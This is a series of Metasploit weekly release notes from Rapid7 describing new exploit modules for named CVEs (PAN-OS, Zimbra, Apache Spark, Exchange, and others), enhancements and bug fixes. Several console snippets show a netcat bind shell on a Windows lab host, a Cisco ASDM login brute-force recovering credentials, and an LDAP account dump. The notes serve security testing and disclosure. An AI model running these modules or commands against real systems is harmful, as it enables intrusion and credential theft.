[*] Custom session 1 opened (10.5.135.101:4567 -> 127.0.0.1) at 2022-09-08 15:29:02 -0500


[*] 10.5.132.159 - Custom session 1 closed.  Reason: User exit
[+] Custom stage sent; session has been closed
msf6 exploit(windows/smb/psexec) > exit

Now, we can just open a netcat session to the independent bind shell we started on the target:



[ruby-3.0.2@metasploit-framework](upstream-master) tmoose@ubuntu:~/rapid7/metasploit-framework$ nc 10.5.132.159 4444
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::1054:53:8f37:5615%11
   IPv4 Address. . . . . . . . . . . : 10.5.132.159
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.5.132.1

Tunnel adapter isatap.{A69D5981-18E2-43CF-982C-D844D6BB7D03}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

C:\Windows\system32>

Module added to exploit OS Command Injection in PAN-OS

Mikhail Klyuchnikov, Nikita Abramov, UnD3sc0n0c1d0, and jheysel-r7 introduced a new module that exploits an OS Command Injection vulnerability CVE-2020-2038 in PAN-OS. This exploit affects versions of PAN-OS 9.0 up to 9.0.10, 9.1 up to 9.1.4, and 10.0 up to 10.0.1. PAN-OS runs one of the leading enterprise firewalls, Palo Alto Networks next-generation firewall (NGFW). The National Vulnerability Database ranks the severity of this exploit as a high 7.2, as administrators of the system are able to execute arbitrary commands with root privileges. This is due to the API not employing sufficient filtering of input for its "op" request. An excellent writeup on exploiting this vulnerability and other similar vulnerabilities can be found on PT Swarm.

New module content (4)

SuiteCRM authenticated SQL injection in export functionality by Exodus Intelligence, Redouane NIBOUCHA, and jheysel-r7 – This adds support for EIP-0f5d2d7f, a vulnerability in the uid parameter of the index.php?entryPoint=export page on SuiteCRM prior to 7.x prior to 7.12.6 that allows for authenticated SQL injection. The module exploits this SQL injection vulnerability to extract the usernames and password hashes for SuiteCRM users, which can then be cracked offline later to gain access to SuiteCRM.
Palo Alto Networks Authenticated Remote Code Execution by Mikhail Klyuchnikov, Nikita Abramov, UnD3sc0n0c1d0, and jheysel-r7, which exploits CVE-2020-2038 – This adds an exploit module that leverages an OS Command Injection vulnerability in the PAN-OS management interface versions 10.0 to 10.0.1, versions 9.1.0 to 9.1.4, and version 9.0.0 to 9.0.10. This vulnerability is identified as CVE-2020-2038 and allows authenticated administrators to execute arbitrary OS commands with root privileges.
#16521 from bwatters-r7 – This adds a 32-bit and 64-bit custom stage Windows payload. The custom stage allows users to provide their own custom executable code to be delivered as the payload stage in place of Meterpreter, Shell and other Metasploit-provided stages.
#16906 from bcoles – This improves the post/windows/gather/enum_snmp module with shell and Powershell sessions support as well as fixes issues that low-privileged sessions would run into while reading the registry.

Enhancements and features (5)

#16911 from bcoles – This adds support for non-Meterpreter sessions and for WOW64 Meterpreter sessions to the post/windows/gather/enum_ms_product_keys module.
#16929 from bcoles – The post/windows/gather/enum_services module has been updated to support non-Meterpreter sessions, to fix some bugs, and to clean up the code. Additionally documentation has been added on how to use the module.
#16930 from bcoles – This updates the scripts/resource/dev_checks.rc resource script to fix issues and add additional module checks.
#16953 from bcoles – The enum_domain script has been updated to support Powershell and Shell sessions and its documentation and code have been cleaned up.
#17008 from EmilioPanti – rpc_core.rb has been updated so that it now reports the number of evasion modules within Metasploit. Previously this statistic wasn’t being reported, whilst other statistics like number of exploit modules, auxiliary modules, and payloads were.

Bugs fixed (5)

#16928 from bcoles – Multiple bugs have been fixed in the Msf::Post::Windows::Service mixin. Additionally, several methods have been adjusted within this mixin so that the data types they use or return are consistent.
#16998 from adfoster-r7 – Fixes a crash in modules using the IAX2 client.
#17013 from zeroSteiner – This PR enhances exploit/multi/http/jenkins_script_console to handle changes to the login process for Jenkins newer than version 2.246.
#17014 from adfoster-r7 – This fixes the exploit/multi/php/ignition_laravel_debug_rce module to use the default HTTP timeout for the check method. Without this, the check method would yield false negatives on slower connections.
#17018 from adfoster-r7 – This fixes the route add command to use a sensible default netmask.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Metasploit Weekly Wrap-Up

2022-09-09 Navya Harika Karaka

Post Syndicated from Navya Harika Karaka original https://blog.rapid7.com/2022/09/09/metasploit-weekly-wrap-up-175/

Authenticated command injection vulnerability of Cisco ASA-X with FirePOWER Services:

Metasploit Weekly Wrap-Up

[jbaines-r7] (https://github.com/jbaines-r7) added a new module that exploits an authenticated command injection vulnerability CVE-2022-20828 of Cisco ASA-X with FirePOWER Services. This vulnerability affects all Cisco ASA appliances that support ASA FirePOWER module. Note that, although a patch has been added to most recent ASA FirePOWER module versions such as 6.2.3.19, 6.4.0.15, 6.6.7, and 7.0.21, some versions such as 6.2.2 and earlier, 6.3, 6.5, and 6.7 will not receive the patch. This exploit could allow the attacker to get root access and pivot to the inside network along with the outside network. This exploit takes advantage of the FirePower Services SFR module’s Linux virtual machine via ASA’s ASDM web server which also runs snort on the traffic. Therefore, an attacker can have access to the diverted traffic as well. Check out the (https://www.youtube.com/watch?v=_4FEU4GDtB8) of the exploit for more information!

Remote code execution vulnerability of Apache Spark:

KostyaKortchinsky and [h00die-gr3y] (https://github.com/h00die-gr3y) introduced a new module that exploits a remote code execution vulnerability CVE-2022-33891 in Apache Spark. This exploit affects several Apache Spark versions such as 3.0.3 and earlier, 3.1.1 to 3.1.2 and versions 3.2.0 to 3.2.1. Apache Spark allows its users to enable Access Control Lists (ACLs) via the configuration option spark.acls.enable. This was introduced in order to improve the security access within Apache Spark application but the code that’s triggered by this configuration option leads to a malicious shell command injection vulnerability. Check out this post by [HuskyHacks] (https://github.com/HuskyHacks) who provided more information along with great examples!

New module content (2)

Apache Spark Unauthenticated Command Injection RCE by [KostyaKortchinsky] (https://twitter.com/crypt0ad?lang=en) and [h00die-gr3y] (https://github.com/h00die-gr3y), which exploits CVE-2022-33891 – This exploits an unauthenticated command injection vulnerability in Apache Spark. The spark.acls.enable setting permits command injection through the id command via a POST request to Apache Spark’s base endpoint containing arbitrary code in the doAs parameter. The exploit achieves unauthenticated RCE as the spark user.
Cisco ASA-X with FirePOWER Services Authenticated Command Injection by [jbaines-r7] (https://github.com/jbaines-r7), which exploits CVE-2022-20828 – This adds an exploit module that leverages an authenticated command injection vulnerability in Cisco ASA-X with FirePOWER Services. This vulnerability is identified as CVE-2022-20828 and has been patched in ASA FirePOWER module versions 6.2.3.19, 6.4.0.15, 6.6.7, and 7.0.21. Note that versions 6.2.2 and earlier, 6.3, 6.5, and 6.7 won’t receive a patch.

Enhancements and features (7)

#16901 from bcoles – The post/windows/manage/killav.rb script has been updated to support shell and PowerShell sessions and has undergone some code cleanup. Additionally, documentation has now been created to explain its operations and how to use it.
#16934 from bcoles – This adds support for dumping process memory by name in the post/windows/gather/memory_dump module.
#16947 from ILightThings – This adds support for formatting buffers for golang.
#16948 from gwillcox-r7 – This adds arguments for specifying the username, password and database to the #run_sql post method.
#16952 from bcoles – This PR improves the domain_controller? method to allow lower-priv users to invoke it, extends it to support shell sessions, and adds additional useful domain controller enumeration methods to the library.
#16973 from HuskyHacks – This adds support for formatting buffers for nim.
#16983 from bcoles – This PR adds documentation, references and a more complete description for the firefox_xpi_bootstrapped_addon module.

Bugs fixed (5)

#16861 from adfoster-r7 – Fixes a bug in cmd/unix/reverse_ssh that stopped reverse SSH sessions from opening.
#16926 from jmartin-r7 – Fixes a bug when using RPC service with the analyze command and specifying a workspace, i.e. within Metasploit RPC client – rpc.call('db.analyze_host', { host: '<metasploitable3 ip>', workspace: 'other' } ).
#16968 from luisfso – This PR adds support for the new syntax of the find command’s perm parameter while also maintaining support for the deprecated syntax.
#16972 from cgranleese-r7 – Updates msfconsole’s tables to support word wrapping when colors are present.
#16974 from jbaines-r7 – Updates Rex::Proto::Http::Client to rely on Ruby’s built in string comparison.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Metasploit Weekly Wrap-Up

2022-09-02 Christopher Granleese

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2022/09/02/metasploit-weekly-wrap-up-174/

ICPR Certificate Management

Metasploit Weekly Wrap-Up

This week Metasploit has a new ICPR Certificate Management module from Oliver Lyak and our very own Spencer McIntyre, which can be utilized for issuing certificates via Active Directory Certificate Services. It has the capability to issue certificates which is useful in a few contexts including persistence, ESC1 and as a primitive necessary for exploiting CVE-2022-26923. Resulting in the PFX certificate file being stored to loot and is encrypted using a blank password.

ManageEngine ADAudit Plus and DataSecurity Plus Xnode enum

Another addition thanks to Erik Wynter and Sahil Dhar, that brings two new auxiliary/gather modules and docs that take advantage of default Xnode credentials (CVE-2020–11532) in order to enumerate active directory information and other sensitive data via the DataEngine Xnode server (Xnode). Because both modules rely on the same code to interact with Xnode, this change also adds a mixin at lib/msf/core/auxiliary/manageengine_xnode that is leveraged by both modules (plus by a third module that will be part of a separate PR). Both modules also come with configuration files to determine what data will be enumerated from Xnode. The PR contains even more information on the vulnerable systems and extensive notes!

New module content (5)

ICPR Certificate Management by Oliver Lyak and Spencer McIntyre – This adds a module for issuing certificates via Active Directory Certificate Services, which is useful in a few contexts including persistence and for some specific exploits. The resulting PFX certificate file is stored to the loot and is encrypted using a blank password.
ManageEngine ADAudit Plus Xnode Enumeration by Erik Wynter and Sahil Dhar, which exploits CVE-2020-11532 – Two new auxiliary/gather modules have been added that take advantage of default Xnode credentials, aka CVE-2020–11532, in order to enumerate Active Directory information and other sensitive data via the DataEngine Xnode server. Additionally, a new library has been added to provide reusable functionality for interacting with Xnode servers.
ManageEngine DataSecurity Plus Xnode Enumeration by Erik Wynter and Sahil Dhar, which exploits CVE-2020-11532 – Two new auxiliary/gather modules have been added that take advantage of default Xnode credentials, a.k.a CVE-2020–11532, in order to enumerate Active Directory information and other sensitive data via the DataEngine Xnode server. Additionally, a new library has been added to provide reusable functionality for interacting with Xnode servers.
Zyxel Firewall SUID Binary Privilege Escalation by jbaines-r7, which exploits CVE-2022-30526 – This adds an LPE exploit for Zyxel Firewalls that can allow a user to escalate themselves to root. The vulnerability is identified as CVE-2022-30526 and is due to a suid binary that allows any user to copy files with root permissions.
CVE-2022-30190 AKA Follina by bwatters-r7 – This updates the exploit for CVE-2022-30190 (A.K.A Follina) to support generating RTF exploit documents. RTF documents are helpful for not only being another exploit vector, but they will trigger the payload execution when viewed by Explorer’s preview tab without needing user interaction to enable editing functionality.

Enhancements and features (4)

#16746 from adfoster-r7 – This updates the MSSQL login scanner to catch exceptions and continue running.
#16900 from bcoles – This adds a new #kill_process method that supports shell, PowerShell, and Meterpreter sessions on different platforms.
#16903 from bcoles – This cleans up the enum_shares post modules and adds support for shell sessions.
#16959 from adfoster-r7 – The time command has been updated with the --cpu and --memory profiler options to allow users to get memory and CPU usage profiles when running a command inside msfconsole.

Bugs fixed (5)

#16750 from bojanisc – This updates the exploit/multi/http/jenkins_script_console module to use the decoder from the java.util.Base64 class in place of the now-deprecated decoder from the sun.misc.BASE64Decoder class, enabling exploitation of newer Jenkins versions.
#16869 from bcoles – This fixes an issue in the file_remote_digestmd5() and file_remote_digestsha1() methods where read_file() would return an error message instead of the remote file contents. Additionally, the file_remote_digest* methods now support more session types, and they have a new util option that allows the user to perform the hashing on the remote host instead of downloading the remote file and performing the hashing locally.
#16918 from rbowes-r7 – A bug has been fixed in the module for CVE-2022-30333 whereby if the server responded with a 200 OK response, the module would keep trying to trigger the payload. This would lead to multiple sessions being returned when only one was desired.
#16920 from zeroSteiner – A typo has been fixed in _msfvenom that prevented ZSH autocompletion from working when using the --arch argument with msfvenom.
#16955 from gwillcox-r7 – This fixes an issue in the LDAP query module that would cause issues if the user queried for a field that was populated with binary data.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from

GitHub:

[Pull Requests 6.2.14…6.2.15][prs-landed]
[Full diff 6.2.14…6.2.15][diff]

If you are a git user, you can clone the [Metasploit Framework repo][repo] (master branch) for the latest.

To install fresh without using git, you can use the open-source-only [Nightly Installers][nightly] or the

[binary installers][binary] (which also include the commercial edition).
[binary]: https://www.rapid7.com/products/metasploit/download.jsp
[diff]: https://github.com/rapid7/metasploit-framework/compare/6.2.14…6.2.15
[prs-landed]: https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:"2022-08-25T17%3A06%3A18%2B01%3A00..2022-09-01T12%3A53%3A23-04%3A00"
[nightly]: https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers
[repo]: https://github.com/rapid7/metasploit-framework

Metasploit Wrap-Up

2022-08-27 Shelby Pace

Post Syndicated from Shelby Pace original https://blog.rapid7.com/2022/08/26/metasploit-wrap-up-173/

Zimbra Auth Bypass to Shell

Metasploit Wrap-Up

Ron Bowes added an exploit module that targets multiple versions of Zimbra Collaboration Suite. The module leverages an authentication bypass (CVE-2022-37042) and a directory traversal vulnerability (CVE-2022-27925) to gain code execution as the zimbra user. The auth bypass functionality correctly checks for a valid session; however, the function that performs the check does not return and instead proceeds with execution. Because of this, an attacker only needs a valid account to get a shell. The directory traversal vulnerability lives in Zimbra’s Zip file extraction functionality, enabling an attacker to write an arbitrary file to a web directory. Coupling those two vulnerabilities together, the module writes a JSP shell to the target via a POST request to the /mboximport endpoint. These vulnerabilities have been reported as exploited in the wild.

Another Deserialization Flaw in Exchange

Our very own zeroSteiner submitted a new module that exploits an authenticated .Net deserialization vulnerability in Microsoft Exchange. The vulnerability is due to a flaw in the ChainedSerializationBinder, a type validator for serialized data. Provided the attacker has credentials for at least a low-privileged user, this exploit will result in code execution as NT AUTHORITY\SYSTEM.

New module content (2)

Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925) by Ron Bowes, Volexity Threat Research, and Yang_99’s Nest, which exploits CVE-2022-37042 – adds a module for CVE-2022-27925 and CVE-2022-37042. An attacker can exploit these issues to bypass authentication and then exploit a ZIP file path directory traversal vulnerability to gain RCE as the zimbra user.
#16915 from zeroSteiner – A new module has been added for CVE-2022-23277 which is another ChainedSerializationBinder bypass that results in RCE on vulnerable versions of Exchange prior to the March 8th 2022 security updates.

Enhancements and features (6)

#16701 from jbaines-r7 – This improves the original auxiliary/scanner/http/cisco_asa_asdm scanner module by adding the ability to brute force the Cisco ASA’s Clientless SSL VPN (webvpn) interface. The old module has been replaced by two new modules, this one and auxiliary/scanner/http/cisco_asa_asdm_bruteforce, which provide brute force of the Cisco ASA’s ASDM interface directly.
#16898 from bcoles – This adds a Msf::Post::Windows::Accounts.domain_controller? method and removes is_dc? methods from several modules in favor of using the new method.
#16899 from bcoles – This removes the domain_list_gen Meterpreter script which has been replaced by the post/windows/gather/enum_domain_group_users post module.
#16907 from bcoles – This improves the MS10-092 LPE exploit module. It uses the new task manager mixin, adds additional module metadata, and documentation.
#16912 from bcoles – This removes the sound recorder Meterpreter script. It has been replaced by the record_mic post module.
#16938 from zeroSteiner – The ldap_query module has been updated to allow the stored query templates to specify a Base DN prefix. Additionally, two ADCS-related queries that then use this to enumerate certificate authorities and certificate templates.

Bugs fixed (4)

#16925 from rbowes-r7 – This fixes some issues with the payload generation in the UnRAR generic exploit module (CVE-2022-30333). This also adds the option to provide its own custom payload.
#16931 from bcoles – A bug has been fixed in Rex::Post::Meterpreter::Extensions::Stdapi::AudioOutput.play_file where a channel would be opened before the path parameter was verified. This could lead to dangling channels being opened which would not be closed until Meterpreter was shut down.
#16935 from adfoster-r7 – Fixes multiple SSH warnings when loading msfconsole on Ubuntu 22.04 or the latest Kali version.
#16936 from adfoster-r7 – Fixes a crash when using evasion modules when mingw is not present on the host machine for generating encrypted payloads.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Metasploit Wrap-Up

2022-08-19 Alan David Foster

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2022/08/19/metasploit-wrap-up-172/

Advantech iView NetworkServlet Command Injection

Metasploit Wrap-Up

This week Shelby Pace has developed a new exploit module for CVE-2022-2143. This module uses an unauthenticated command injection vulnerability to gain remote code execution against vulnerable versions of Advantech iView software below 5.7.04.6469. The software runs as NT AUTHORITY\SYSTEM, granting the module user unauthenticated privileged access with relatively low effort. Version 5.7.04.6469 has been patched to require authentication, but remote code execution can still be achieved – gaining a shell as the LOCAL SERVICE user.

Cisco ASA ASDM Brute-force Login

Our very own Jake Baines has contributed a new module which scans for the Cisco ASA ASDM landing page and performs login brute-force to identify valid credentials:

msf6 > use auxiliary/scanner/http/cisco_asa_asdm_bruteforce
msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > set RHOST 10.9.49.201
RHOST => 10.9.49.201
msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > set VERBOSE false
VERBOSE => false
msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > run
[*] The remote target appears to host Cisco ASA ASDM. The module will continue.
[*] Starting login brute force...
[+] SUCCESSFUL LOGIN - "cisco":"cisco123"
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) >

New module content (2)

Cisco ASA ASDM Brute-force Login by jbaines-r7 – This adds a scanner module to brute force the Cisco ASA’s ASDM interface in its default configuration.
Advantech iView NetworkServlet Command Injection by Shelby Pace, rgod, and y4er, which exploits CVE-2022-2143 – This adds an exploit module that leverages a command injection vulnerability in Advantech iView (CVE-2022-2143) to get remote command execution as the SYSTEM user. Versions below 5.7.04.6469 are vulnerable and do not require authentication. Version 5.7.04.6469 is still vulnerable but requires valid credentials to be exploited. Also, this version only gets you RCE as the LOCAL SERVICE user.

Enhancements and features (7)

#16883 from gwillcox-r7 -This PR deprecates the srt_webdrive_priv script as the same functionality is included in the service_permissions post module.
#16884 from bcoles – This PR deprecates the credcollect script as it has effectively been replaced by post/windows/gather/credentials/credential_collector
#16902 from bcoles – The scripts/meterpreter/killav.rb script has been removed since scripts have been depreciated for over 5 years. It has been replaced with post/windows/manage/killav.
#16905 from bcoles – The scripts/meterpreter/panda_2007_pavsrv51.rb script has been removed and replaced by exploit/windows/local/service_permissions. Note that scripts have been deprecated for over 5 years and are no longer supported.
#16908 from bcoles – Remove ./scripts/meterpreter/dumplinks.rb, replace with post/windows/gather/dumplink which does pretty much the same thing but is a proper module vs a deprecated script, since we stopped supporting scripts several years ago.
#16909 from bcoles – scripts/meterpreter/get_pidgin_creds.rb has been removed since scripts have been depreciated for some time now and are no longer supported. It has been replaced by post/multi/gather/pidgin_cred.
#16910 from bcoles – The scripts/meterpreter/arp_scanner.rb script has been replaced with post/windows/gather/arp_scanner which implements the same logic with an improved OUI database to help fingerprint the MAC vendor.

Bugs fixed (1)

#16881 from bcoles – This fixes a crash in the post/windows/manage/forward_pageant module caused by the removal of Dir::Tmpname.make_tmpname() in Ruby 2.5.0. This also makes some improvements to the code.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Metasploit Weekly Wrap-Up

2022-08-05 Shelby Pace

Post Syndicated from Shelby Pace original https://blog.rapid7.com/2022/08/05/metasploit-weekly-wrap-up-170/

Log4Shell in MobileIron Core

Metasploit Weekly Wrap-Up

Thanks to jbaines-r7 we have yet another Log4Shell exploit. Similar to the other Log4Shell exploit modules, the exploit works by sending a JNDI string that once received by the server will be deserialized, resulting in unauthenticated remote code execution as the tomcat user. Vulnerable versions of MobileIron Core have been reported as exploited in the wild.

VMware Workspace ONE Access LPE

Our very own Spencer McIntyre discovered and added a local privilege escalation module for CVE-2022-31660 in VMware Workspace ONE Access. By default, the horizon user has write permissions to the /opt/vmware/certproxy/bin/cert-proxy.sh script, and the sudo configuration does not require supplying a password when invoking the script. Due to this, an attacker can write arbitrary code to the /opt/vmware/certproxy/bin/cert-proxy.sh script and escalate their privileges to that of the root user by executing the certproxyService.sh with sudo. Because the horizon user runs the externally-facing web application in VMware Workspace ONE Access, CVE-2022-22954 can be leveraged for initial access to the target.

XML-RPC Unauthenticated RCE in Zoho Password Manager

Grant Willcox of the Metasploit team added a module that exploits a deserialization flaw in Zoho Password Manager Pro. Sending a single POST request containing XML-RPC data to the /xmlrpc endpoint will result in unauthenticated code execution as NT AUTHORITY\SYSTEM.

New module content (5)

Cisco PVC2300 POE Video Camera configuration download by Craig Heffner and Erik Wynter – This adds a module targeting Cisco PVC2300 IP Cameras that will download the configuration file using hard-coded credentials.
BACnet Scanner by Paz – This adds a new scanner module that discovers BACnet devices on the network and extracts model name, software version, firmware revision, and device description. Once the data is processed, it is displayed on screen and saved to a local xml file.
MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell) by RageLtMan, Spencer McIntyre, jbaines-r7, and rwincey, which exploits CVE-2021-44228 – This adds an exploit for MobileIron which is affected by the Log4Shell vulnerability. The result is an unauthenticated remote code execution in the context of the web application user.
VMware Workspace ONE Access CVE-2022-31660 by Spencer McIntyre, which exploits CVE-2022-31660 – This module exploits CVE-2022-31660, an LPE disclosed by VMware in VMSA-2022-0021. The underlying flaw is that the /opt/vmware/certproxy/bin/cert-proxy.sh script is writable by the horizon user who can also indirectly execute it by invoking the certproxyService.sh script via sudo which is permitted without a password, enabling escalation to root.
Zoho Password Manager Pro XML-RPC Java Deserialization by Grant Willcox, Vinicius, and Y4er, which exploits CVE-2022-35405 – This PR adds in an exploit module for CVE-2022-35405 aka Zoho Password Manager Pro XML-RPC Unauthenticated RCE as SYSTEM.

Enhancements and features (3)

#16833 from gwillcox-r7 – This PR adds an option to the host command to make it easier to delete host tags.
#16840 from bcoles – This replaces some Meterpreter-only method calls with method calls that check the session type, which allows non-Meterpreter sessions to use read_profile_list
and load_missing_hives. Also, this changes read_profile_list to be able to read profile information for all accounts.
#16858 from adfoster-r7 – This updates ZeroLogon to have better error handling in the check method. This will cause the error from an invalid NetBIOS name to be reported with a meaningful message.

Bugs fixed (8)

#16820 from gwillcox-r7 – This PR fixes an issue in the ldap_query module where if the datastore option "action" wasn’t set the module would fail.
#16822 from adfoster-r7 – This fixes a bug in Rex::Ui::Text::Input::Buffer::BufferSock that was causing data to be occasionally lost due to the rsock monitor routine stopping abruptly.
#16825 from rbowes-r7 – The IMAP credential capture module did not appropriately handle literal strings as specified by RFC3501. The code has been updated to handle these strings efficiently.
#16832 from gwillcox-r7 – This fix removes an unnecessary echo statement from the ms10_092_schelevator module.
#16839 from bcoles – Fixes shell_registry_enumvals/getvaldata error checking.
#16844 from bcoles – This PR updates the post/multi/gather module to support non-meterpreter sessions like shell and powershell.
#16846 from jmartin-r7 – Updates auxiliary/scanner/ssh/ssh_login to gracefully handle Errno::EPIPE exceptions.
#16848 from jmartin-r7 – Fix a crash when updating session information in Meterpreter.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Metasploit Weekly Wrap-Up

2022-07-29 Spencer McIntyre

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2022/07/29/metasploit-weekly-wrap-up-169/

Roxy-WI Unauthenticated RCE

Metasploit Weekly Wrap-Up

This week, community member Nuri Çilengir added an unauthenticated RCE for Roxy-WI. Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers. The vulnerability can be triggered by a specially crafted POST request to a Python script where the ipbackend parameter is vulnerable to OS command injection. The result is reliable code execution within the context of the web application user.

Fewer Meterpreter Scripts

Community member bcoles removed multiple Meterpreter scripts which have been deprecated for years. Metasploit’s documentation has omitted details on how to write them since 2014 and removing the existing ones in favor of their new post-module equivalents ensures users are using the most up-to-date code and workflows. Post modules have a number of advantages over Meterpreter scripts and Metasploit has equivalents for each of the Meterpreter scripts that were removed.

Helpful Suggestions

Msfconsole will now suggest datastore option names when an invalid option is specified. This should help users understand when they make a mistake and misspell an option name. The original behavior would just set the invalid option which may leave the user confused when they think they set one thing but the option did not actually change.

For example, prior to these changes setting LHSOT (instead of LHOST) the option would just be set, effectively not doing anything.

msf6 exploit(windows/smb/psexec) > set LHSOT 192.168.169.1
LHSOT => 192.168.169.1

Now the new behavior will identify that LHSOT is not valid in the current context and will suggest setting LHOST instead.

msf6 exploit(windows/smb/psexec) > set LHSOT 192.168.159.1
[-] Unknown datastore option: LHSOT. Did you mean LHOST?
msf6 exploit(windows/smb/psexec) >

New module content (1)

Roxy-WI Prior to 6.1.1.0 Unauthenticated Command Injection RCE by Nuri Çilengir, which exploits CVE-2022-31137

Enhancements and features (6)

#16774 from zeroSteiner – The set command has been updated so that if an invalid datastore option is provided, a suggestion will be made for a valid datastore option, where possible. Additionally, the behavior has been changed so that one can no longer set a datastore value that is not valid within the given content.
#16798 from bcoles – The deprecated scripts/meterpreter/pml_driver_config.rb script has been removed from Metasploit since Metasploit scripts have been deprecated for over 5 years now. Please use exploit/windows/local/service_permissions instead which contains a more modern implementation of the same principle this exploit utilized.
#16801 from bcoles – The deprecated scripts/meterpreter/schelevator.rb script has been removed in favor of exploit/windows/local/ms10_092_schelevator. Scripts were deprecated over 5 years ago and should no longer be used.
#16823 from bcoles – The deprecated scripts/meterpreter/prefetchtool.rb has been removed and replaced with the post/windows/gather/enum_prefetch.rb post module.
#16830 from bcoles – Remove deprecated scripts/meterpreter/getvncpw.rb script in favor of the post/windows/gather/credentials/vnc post module which is more modern and has more features.
#16831 from bcoles – Remove the deprecated scripts/meterpreter/get_env.rb in favor of the post/multi/gather/env post module.

Bugs fixed (6)

#16094 from 3V3RYONE – A bug has been fixed in the pg_ctl.rb helper whereby it was possible that initializing and starting databases using msfdb init might fail due to the pg_ctl.rb helper not properly setting unix_socket_directories to a path that a non-root user can write to. This code has now been updated so that it will set the unix_socket_directories setting to a path that the current user can write to or will error out if it cannot find a writeable directory to use for the socket file.
#16668 from sempervictus – A bug has been fixed in the HTTP crawler module and its associated library whereby the code expected an object to be populated when it may not be. This has been fixed with additional validation.
#16810 from entity0xfe – The host command has been updated to fix a bug whereby the -t flag was not properly accepting the <tag> parameter that it was supposed to accept and process. Additionally, the documentation for this option has been updated to be clearer.
#16817 from jmartin-r7 – Several modules and libraries were previously calling Msf::Config.get_config_root which did not properly account for changes to the configuration path that the user might make. These calls have been replaced with calls to Msf::Config.config_directory which will appropriately take the user’s configuration settings into account.
#16819 from adfoster-r7 – A bug has been fixed whereby running the hosts command with the -c flag to filter by columns would result in a stack trace. The command now correctly returns the output with only the columns specified to the -c flag.
#16824 from bcoles – A bug has been fixed in the is_admin? and is_system? post exploitation methods, which previously incorrectly reported the user as always being an administrator and a system user respectively when run on shell sessions.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

Metasploit Weekly Wrap-Up

2022-07-22 Christophe De La Fuente

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2022/07/22/metasploit-weekly-wrap-up-167/

The past, present and future of Metasploit

Metasploit Weekly Wrap-Up

Don’t miss Spencer McIntyre’s talk on the Help Net Security’s blog. Spencer is the Lead Security Researcher at Rapid7 and speaks about how Metasploit has evolved since its creation back in 2003. He also explains how the Framework is addressing today’s offensive security challenges and how important is the partnership with the community.

LDAP swiss army knife

This week, our very own @gwillcox-r7 added an auxiliary module that will likely help you to dump useful information from LDAP servers. This module allows you to remotely retrieve data using either your own custom query or a set of LDAP queries under a specific category. In addition to the available predefined queries, the user can also provide a JSON or YAML file containing custom queries to be executed.

Here are the available predefined queries:

msf6 auxiliary(gather/ldap_query) > show actions

Auxiliary actions:

   Name                      Description
   ----                      -----------
   ENUM_ACCOUNTS             Dump info about all known user accounts in the domain.
   ENUM_ALL_OBJECT_CATEGORY  Dump all objects containing any objectCategory field.
   ENUM_ALL_OBJECT_CLASS     Dump all objects containing any objectClass field.
   ENUM_COMPUTERS            Dump all objects containing an objectCategory of Computer.
   ENUM_DOMAIN_CONTROLLERS   Dump all known domain controllers.
   ENUM_EXCHANGE_RECIPIENTS  Dump info about all known Exchange recipients.
   ENUM_EXCHANGE_SERVERS     Dump info about all known Exchange servers.
   ENUM_GROUPS               Dump info about all known groups in the LDAP environment.
   ENUM_ORGROLES             Dump info about all known organizational roles in the LDAP environment.
   ENUM_ORGUNITS             Dump info about all known organization units in the LDAP environment.
   RUN_QUERY_FILE            Execute a custom set of LDAP queries from the JSON or YAML file specified by QUERY_FILE.
   RUN_SINGLE_QUERY          Execute a single LDAP query using the QUERY_FILTER and QUERY_ATTRIBUTES options.

Here is how you can dump information about users in a Windows domain:

msf6 auxiliary(gather/ldap_query) > set action ENUM_ACCOUNTS
action => ENUM_ACCOUNTS
msf6 auxiliary(gather/ldap_query) > run RHOSTS=10.0.0.33 BIND_DN=MYDOMAIN\\Administrator BIND_PW=123456
[*] Running module against 10.0.0.33

[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] 10.0.0.33:389 Discovered base DN: DC=mydomain,DC=local
[*] CN=DC02 OU=Domain Controllers DC=mydomain DC=local
===============================================

 Name                Attributes
 ----                ----------
 displayname         DC02$
 name                DC02
 samaccountname      DC02$
 useraccountcontrol  532480

[*] CN=Administrator CN=Users DC=mylab DC=local
===========================================

 Name                Attributes
 ----                ----------
 name                Administrator
 samaccountname      Administrator
 useraccountcontrol  512

 ...[SNIP]...

Win2k summer clean up

For those nostalgic about old Windows systems, bcoles did a great cleanup of old modules targeting Win2k. He breathed life back into modules such as ms01_023_printer, ms02_065_msadc and ms03_007_ntdll_webdav by fixing many issues and adding offsets to support many more Win2k flavors.

New module content (1)

